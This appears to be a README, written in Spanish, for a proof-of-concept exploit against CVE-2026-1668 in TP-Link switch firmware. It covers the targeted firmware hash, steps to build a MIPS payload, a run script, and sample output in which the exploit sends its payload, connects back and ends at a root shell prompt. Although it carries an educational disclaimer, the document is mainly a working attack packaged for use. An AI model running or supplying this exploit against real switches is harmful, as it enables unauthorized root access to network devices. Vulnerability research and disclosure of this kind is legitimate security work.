
Prueba de concepto de exploit para CVE-2026-1668 en el firmware del switch TP-Link, que entrega un payload MIPS que proporciona una shell de root en dispositivos vulnerables.
Este es un exploit de prueba de concepto para CVE-2026-1668. Está destinado únicamente a fines educativos. Por favor, no intentes explotar sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de explotar.
Esta prueba de concepto fue desarrollada contra una imagen de firmware con el siguiente hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Nombres de firmwares que se sabe que coinciden con ese hash (no exhaustivo):
Es probable que las versiones de firmware anteriores también sean vulnerables, pero pueden requerir cambios menores en el payload del exploit.
Puedes encontrar una explicación de cómo funciona el payload en esta entrada de blog.
Se requiere una cadena de herramientas GCC para MIPS Linux para compilar el payload. En Ubuntu 24.04, se puede instalar con sudo apt install gcc-mips-linux-gnu.
$ make
Este exploit debe ejecutarse antes de que el servidor HTTP haya atendido su primera solicitud (es decir, en un arranque limpio).
$ ./run.sh
El script debería dejarte en un shell de root. Si no es así, el exploit ha fallado.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #